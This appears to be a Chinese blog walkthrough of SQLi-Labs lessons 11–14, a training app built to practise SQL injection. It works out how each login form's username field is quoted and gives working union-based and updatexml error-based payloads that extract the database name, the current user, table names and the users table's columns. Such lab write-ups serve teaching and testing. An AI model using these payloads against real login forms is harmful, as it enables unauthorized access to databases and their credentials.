SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。
Less 11
SQLI DUMB SERIES-11
![](https://img-blog.csdnimg.cn/direct/b976d1c1d3a84a87b16b961ab5fc067b.png)
判断注入点
尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。
python
uname=admin' -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/2f98f9e00b8d44629a05cfad21d122a9.png)
实施注入
获取数前数据库的数据名和用户名
sql
uname=0' union select database(),user() from dual -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/43ea3c1bdd4b4791b50bfa7a4b61e428.png)
获取当前数据库的表名:
sql
uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/b7d77f1b2d7f46ef9a29856c2be73bdd.png)
获取user表的列名:
python
uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/9a90b01e076c4fbb953c81855b5b4ec8.png)
Less 12
SQLI DUMB SERIES-12
通过输入判断出查询字符串的闭合方式为")
同样通过这一个点获取数据库名和用户名。
python
uname=0") union select database(),user() from dual -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/7340e78e932b4bfe8eda31729c0e87c1.png)
Less 13
SQLI DUMB SERIES-13
判断注入点
SQL语句错误,提示异常。
sql
uname=0'&passwd=1
![](https://img-blog.csdnimg.cn/direct/499517adb0d44161bdd2dc3cd74cc44b.png)
正常输入结果显示成功,不过没有任何提示内容。
sql
uname=admin') -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/0d1355bc67d94952b591f06ffde602e8.png)
如果是这样的话,那就只能通过错误信息来获取数据了,如下所示
sql
uname=0') and updatexml(1,concat(user()),1) -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/5d41546333e74bfa806f8115781c4660.png)
实施注入
sql
uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/ff7956841bb84b79b6e29a22b189e983.png)
获取当前数据库所有的表名
sql
uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/ecb5c9a84e474b439a37d6b712abce20.png)
获取user表所有的列名
sql
uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1
![](https://img-blog.csdnimg.cn/direct/f9ebd7528f1c4db59ab4eced1ce545ba.png)
到此注入成功
Less 14
SQLI DUMB SERIES-14
![](https://img-blog.csdnimg.cn/direct/37ad20d0c69e4095bbb987c0db91e330.png)
判断注入点
测试双引号报错。
sql
uname=admin "&passwd=1
![](https://img-blog.csdnimg.cn/direct/415fa6d2ef9d49cd9efdb6dfcd6dba1c.png)
然后经测试采用双引号加注释符就可以验证登录成功。
sql
uname=admin "-- &passwd=1
![](https://img-blog.csdnimg.cn/direct/18c930fe16494f1f987054d66cc687cc.png)
但这样还不能获取数据,则判断这个注入方式为错误注入。
通过updatexml
方法即可成功注入
sql
uname=admin " and updatexml(1,user(),3)-- &passwd=1
![](https://img-blog.csdnimg.cn/direct/706da160217c4abeb53a1046bb8f5e42.png)
实施注入
获取数据库名
sql
uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1
![](https://img-blog.csdnimg.cn/direct/d6cdc9ac515945e9a2c8f950bb565c3b.png)
获取当前数据库所有的表名
sql
uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1
![](https://img-blog.csdnimg.cn/direct/007b283fdf6b4d1aaa9efbff91fc0e7d.png)
获取user表所有的列名
sql
uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1
![](https://img-blog.csdnimg.cn/direct/50550a44b18a463ea32d0f7ca5ef7304.png)